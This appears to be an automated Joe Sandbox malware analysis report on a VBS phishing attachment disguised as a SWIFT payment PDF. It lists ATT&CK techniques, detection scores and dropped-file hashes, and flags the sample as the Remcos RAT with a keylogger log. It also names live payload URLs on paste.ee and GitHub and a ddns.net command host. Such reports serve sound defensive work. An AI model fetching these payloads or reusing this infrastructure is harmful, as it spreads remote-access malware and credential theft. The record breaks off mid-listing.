            | Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Native API | 221 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
            | Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Access Token Manipulation | 3 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 211 Input Capture | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | 1 Defacement |
            | Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Windows Service | 1 Windows Service | 1 Software Packing | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 21 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Registry Run Keys / Startup Folder | 422 Process Injection | 1 DLL Side-Loading | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | 3 PowerShell | Network Logon Script | 1 Registry Run Keys / Startup Folder | 11 Masquerading | LSA Secrets | 43 System Information Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Security Software Discovery | VNC | GUI Input Capture | 23 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 422 Process Injection | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
            | Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
            | Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Embedded Payloads | Keylogging | 1 System Network Configuration Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
            [Behavior graph, image not reproduced] Behavior Graph ID: 1525550, Sample: SWIFT 103 20240611130143566..., Startdate: 04/10/2024, Architecture: WINDOWS, Score: 100

            | Source | Detection | Scanner | Label | Link |
            | --- | --- | --- | --- | --- |
            | SWIFT 103 202406111301435660 110624-pdf.vbs | 8% | Virustotal | | Browse |
            | SWIFT 103 202406111301435660 110624-pdf.vbs | 5% | ReversingLabs | Win32.Trojan.Generic | |
            No Antivirus matches
            No Antivirus matches
            | Source | Detection | Scanner | Label | Link |
            | --- | --- | --- | --- | --- |
            | s-part-0016.t-0009.t-msedge.net | 0% | Virustotal | | Browse |
            | paste.ee | 1% | Virustotal | | Browse |
            | raw.githubusercontent.com | 0% | Virustotal | | Browse |
            | s-part-0017.t-0009.t-msedge.net | 0% | Virustotal | | Browse |
            | s-part-0017.t-0009.fb-t-msedge.net | 0% | Virustotal | | Browse |
            | www.google.com | 0% | Virustotal | | Browse |
            | ab9001.ddns.net | 16% | Virustotal | | Browse |
            | js.monitor.azure.com | 0% | Virustotal | | Browse |
            | s-part-0032.t-0009.t-msedge.net | 0% | Virustotal | | Browse |
            | mdec.nelreports.net | 0% | Virustotal | | Browse |
            SourceDetectionScannerLabelLink
            https://contoso.com/License0%URL Reputationsafe
            https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
            http://polymer.github.io/AUTHORS.txt0%URL Reputationsafe
            http://geoplugin.net/json.gp/C0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            http://polymer.github.io/CONTRIBUTORS.txt0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            http://polymer.github.io/PATENTS.txt0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js0%URL Reputationsafe
            https://schema.org0%URL Reputationsafe
            http://polymer.github.io/LICENSE.txt0%URL Reputationsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://oneget.org0%URL Reputationsafe
            https://www.linkedin.com/cws/share?url=$0%VirustotalBrowse
            https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf0%VirustotalBrowse
            https://github.com/Youssef13130%VirustotalBrowse
            https://paste.ee1%VirustotalBrowse
            https://aka.ms/msignite_docs_banner0%VirustotalBrowse
            https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml0%VirustotalBrowse
            https://go.microsoft.co1%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            https://analytics.paste.ee1%VirustotalBrowse
            ab9001.ddns.net16%VirustotalBrowse
            https://aka.ms/pshelpmechoose0%VirustotalBrowse
            https://aka.ms/feedback/report?space=610%VirustotalBrowse
            https://management.azure.com/subscriptions?api-version=2016-06-010%VirustotalBrowse
            https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md0%VirustotalBrowse
            https://cdnjs.cloudflare.com0%VirustotalBrowse
            https://learn-video.azurefd.net/vod/player0%VirustotalBrowse
            https://github.com/gewarren0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
            https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt6%VirustotalBrowse
            https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db7250%VirustotalBrowse
            https://secure.gravatar.com0%VirustotalBrowse
            https://client-api.arkoselabs.com/v2/api.js0%VirustotalBrowse
            https://github.com/Thraka0%VirustotalBrowse
            https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev0%VirustotalBrowse
            http://paste.ee1%VirustotalBrowse
            https://aka.ms/certhelp0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://paste.ee/d/XlUYO/06%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            https://github.com/mairaw0%VirustotalBrowse
            https://aka.ms/yourcaliforniaprivacychoices0%VirustotalBrowse
            https://github.com/adegeo0%VirustotalBrowse
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1525550
                                                            Start date and time:2024-10-04 11:32:40 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 10m 13s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:90
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:SWIFT 103 202406111301435660 110624-pdf.vbs
                                                            Detection:MAL
                                                            Classification:mal100.rans.troj.spyw.expl.evad.winVBS@257/82@15/11
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 53
                                                            • Number of non-executed functions: 188
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 192.229.221.95, 93.184.221.240, 184.28.89.167, 142.250.184.238, 64.233.184.84, 216.58.206.67, 88.221.170.101, 34.104.35.123, 184.28.90.27, 142.250.186.106, 172.217.16.202, 172.217.18.106, 142.250.185.170, 172.217.18.10, 142.250.186.74, 142.250.186.42, 142.250.185.106, 142.250.186.138, 216.58.206.74, 142.250.185.74, 172.217.16.138, 216.58.212.138, 142.250.185.138, 216.58.212.170, 216.58.206.42, 52.168.117.171, 104.124.11.50, 104.124.11.18, 13.74.129.1, 13.107.21.237, 204.79.197.237, 20.189.173.24, 142.250.184.227, 52.182.143.210, 51.104.15.252, 142.250.186.142
                                                            • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, e16604.g.akamaiedge.net, onedscolprdeus16.eastus.cloudapp.azure.com, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, prod.fs.microsoft.com.akadns.net, onedscolprdcus10.centralus.cloudapp.azure.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.
                                                            • Execution Graph export aborted for target powershell.exe, PID 1076 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 1396 because it is empty
                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            Time | Type | Description
                                                            05:33:46 | API Interceptor | 40x Sleep call for process: powershell.exe modified
                                                            05:33:57 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                            05:34:26 | API Interceptor | 469505x Sleep call for process: AddInProcess32.exe modified
                                                            Input | Output
                                                            URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 Model: jbxai
                                                            {
                                                            "brand":["unknown"],
                                                            "contains_trigger_text":false,
                                                            "prominent_button_name":"unknown",
                                                            "text_input_field_labels":["unknown"],
                                                            "pdf_icon_visible":false,
                                                            "has_visible_captcha":false,
                                                            "has_urgent_text":false,
                                                            "has_visible_qrcode":false}
                                                            URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 Model: jbxai
                                                            {
                                                            "phishing_score":0,
                                                            "reason":"No text found on page."}
                                                            URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 Model: jbxai
                                                            {
                                                            "brand":["Microsoft"],
                                                            "contains_trigger_text":false,
                                                            "trigger_text":"",
                                                            "prominent_button_name":"Register now",
                                                            "text_input_field_labels":["unknown"],
                                                            "pdf_icon_visible":false,
                                                            "has_visible_captcha":false,
                                                            "has_urgent_text":false,
                                                            "has_visible_qrcode":false}
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                No context
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.8531078571693577
                                                                                Encrypted:false
                                                                                SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugW:gJjJGtpTq2yv1AuNZRY3diu8iBVqFZ
                                                                                MD5:3EFC322D44BFE52AFAAFC854C73EEC39
                                                                                SHA1:770F779A68A20FC3086348A9FCEC1F099B1BB538
                                                                                SHA-256:E51924D8997D40A8332BEEC63492B6F2387539E41DAF53CB348A86A716A3B5EC
                                                                                SHA-512:9C2635CCAA0D0D916EE73E79FD82905C074156DFC2CB897051D5347EF5BA8EFFD1FF142FBE5669BF34DF1C1995E650550622985FC27CE2812B6A063952308492
                                                                                Malicious:false
                                                                                Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb1e5c325, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.6585919109289479
                                                                                Encrypted:false
                                                                                SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                MD5:0DBEA623F1FFACA6AAD1D446C2EE2526
                                                                                SHA1:DCB9759CD7BEDAA214024A62FDF15AD115B76414
                                                                                SHA-256:321B28BBAA3945BD35B3B335A2F18E6F369AB6BE27F503711DE5CB6BEC82B3DC
                                                                                SHA-512:D84E949DF4FDB062CDA860B51B74B96A608BB78E73D85E1462088E16826E6D6315C936E98901E47347BBA5CBF4E756204B1E08B461ACC5AEB3EF816475AD7B93
                                                                                Malicious:false
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.08091830128770645
                                                                                Encrypted:false
                                                                                SSDEEP:3:1Sl/EYerkHhVGuAJkhvekl1/zF/allrekGltll/SPj:E6zrEbrxlCJe3l
                                                                                MD5:54A5759721AD04DF5615AE8834451A35
                                                                                SHA1:CA6ABF5C2DC8A8F93371BFD8422B58CBF79E5760
                                                                                SHA-256:CE11F5DFE253ABAE60AC02B73144EFB0E83E05D26AACE50B00B0A5B78F318236
                                                                                SHA-512:5D1F33412EE094C8173B8578AEC6C792EF5D9F5F3E40E9123C479F6EA5A7D53C4A2B31980812E953277F0BC015EDAE065D324AE7A98C734F4157DBF82CB254C4
                                                                                Malicious:false
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):12620
                                                                                Entropy (8bit):3.450862880059252
                                                                                Encrypted:false
                                                                                SSDEEP:192:dunusunuXuUunufunuXunuEufunuXuUunukunucunuUunuH6unuJ:4
                                                                                MD5:5998B78C27D6A7E39823890F126F54F0
                                                                                SHA1:410CDE188982803B9A79164D696D1890CA2289B6
                                                                                SHA-256:A33F1FACFCD099A42E96022C4C236077F1FF00A3CA69064707116F9D1FAEC63F
                                                                                SHA-512:039852C5B8BB6479B4DB3D9BBEA312210276E42E5FA74CAA334F2E5EA5CB9B920B57360D47E395B85B98C5EF57E314094C50B0BABA2D2A9FB4C22C9F0B2864E1
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                Preview:[2024/10/04 05:33:52 Offline Keylogger Started] [Program Manager] [svchost.exe - This application could not be started.] [Untitled - Google Chrome] [svchost.exe - This application could not be started.] [Untitled - Google Chrome] [svchost.exe - This application could not be started.] [C:\Windows\system32\svchost.exe] [svchost.exe - This application could not be started.] [Untitled - Google Chrome] [Fix .NET Framework 'This application could not be started' - .NET
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2677
                                                                                Entropy (8bit):3.978888079487261
                                                                                Encrypted:false
                                                                                SSDEEP:48:8IdST+yf8H8idAKZdA19ehwiZUklqeh9y+3:8xXfTey
                                                                                MD5:624CE2643F253E7A2D259C2CC78ECC27
                                                                                SHA1:C003FCC245929882599F3A8B9767FE6E317D0EFE
                                                                                SHA-256:ACEB6A6890AA75587536627449C8F2C617D40838E4BB86225963CEB3E03A84C1
                                                                                SHA-512:6120E08A82A48AEFF0707B3438D81183AA78D1AB2CAE36CE80CD355C068AD6489B8899D7C35A0683C9C5A9138237ED7D7327858A051CE285A06E55521FA83139
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,.....z..@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2679
                                                                                Entropy (8bit):3.9933194017767932
                                                                                Encrypted:false
                                                                                SSDEEP:48:81dST+yf8H8idAKZdA1weh/iZUkAQkqehOy+2:8aXfh9Qry
                                                                                MD5:56E09D352AF9841463B917146A5C9B20
                                                                                SHA1:0CDF0FB88CA70028C08EA9DF2B24B469F826A049
                                                                                SHA-256:16B7C904E225366E2ABB8F90EA1D2ACCF5A5D8C635E58F58FA9DDC3B982A0829
                                                                                SHA-512:DCB54EBA6E4DD8273C0E1851C302D69FC9BA3F77BCDA0FF060F21124CBB1E83877818AFAA385137530A292EE2B9D4C2F23B28639EAFC125CD3FD4D51B60F9D06
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,........@...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDY@L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2693
                                                                                Entropy (8bit):4.005841917590716
                                                                                Encrypted:false
                                                                                SSDEEP:48:8xndST+yfsH8idAKZdA14tseh7sFiZUkmgqeh7ssy+BX:8xcXfBnKy
                                                                                MD5:6772387A48350623F2AE9FEE900DAAFB
                                                                                SHA1:C549E5606C82829F6EAF9CF7547B3C16436567E1
                                                                                SHA-256:37AB0D901CDB35B0268C50B17F4BC471724CCF491B00377408C131E297579ED6
                                                                                SHA-512:54512A3A60F1CB4D2D287BD0E3CECD838C9FD4D9B7DDF6B65431DCAE9F195E5477AED699405B59AE385BD068D4E90EB7FBA7BABB5F772787C19E64642AFFC8CB
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDY<L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDY<L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDY<L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDY<L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2681
                                                                                Entropy (8bit):3.992583750694681
                                                                                Encrypted:false
                                                                                SSDEEP:48:80dST+yf8H8idAKZdA1vehDiZUkwqehiy+R:8FXfCky
                                                                                MD5:B13962ECD6F104A082FBD7696569294E
                                                                                SHA1:2DCF81D70A173C1ABD1315F9E28D737632DA6CCA
                                                                                SHA-256:E65E55183B8167917BBCD8C47A961D8B74871A5CB4427224749408EFF328A076
                                                                                SHA-512:5DC179DA5E3EC36C12396D7574C71DC637B5C7FDA6843AE97EC3428A79A79FC933F9EDED0C04557B513270AE562E549F53C188DB83A344353747C6D8FC510396
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2681
                                                                                Entropy (8bit):3.981565231341942
                                                                                Encrypted:false
                                                                                SSDEEP:48:8kXndST+yf8H8idAKZdA1hehBiZUk1W1qehYy+C:8/Xfy94y
                                                                                MD5:EBAD11B0080B762FD2555F03B5E55A96
                                                                                SHA1:9C47C140E62D8BD4DCFCE8E97D2DD8F5ED1DD26A
                                                                                SHA-256:6F9A5130E8AB2B1EFB7D0909E53062FD9B11E5874D616C791FEE6E8B0C630132
                                                                                SHA-512:E17D073327DD620CC69ED370B82A4DBADE614C28273A9E2FE528542AED763A91087214346281664CB3532DF0305BC2A048E025293D2BAD9DF90F8A93B22DA7F0
                                                                                Malicious:false
                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):2683
                                                                                Entropy (8bit):3.9900676222627895
                                                                                Encrypted:false
                                                                                SSDEEP:48:8HdST+yf8H8idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbKy+yT+:88XfsT/TbxWOvTbKy7T
                                                                                MD5:C70885A06F0238B683069C083575866F
                                                                                SHA1:D7C44C67C39CFFCB38DEEAA6E2636AD4B642944E
                                                                                SHA-256:CF38F915361FCFDF4D3528841E70CC8A81228E3ADDD17011EB9A78FD47AC3BE5
                                                                                SHA-512:21FFF7F8B0DBB31DD9428D96C33B3101DA3F4B04E96221F4A0A0CE0449F4AAE5C5501708D1928B065CD647CCE4B3C4E954D0B4190D79C4C329FBE5CBD64A87B5
                                                                                Malicious:false
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
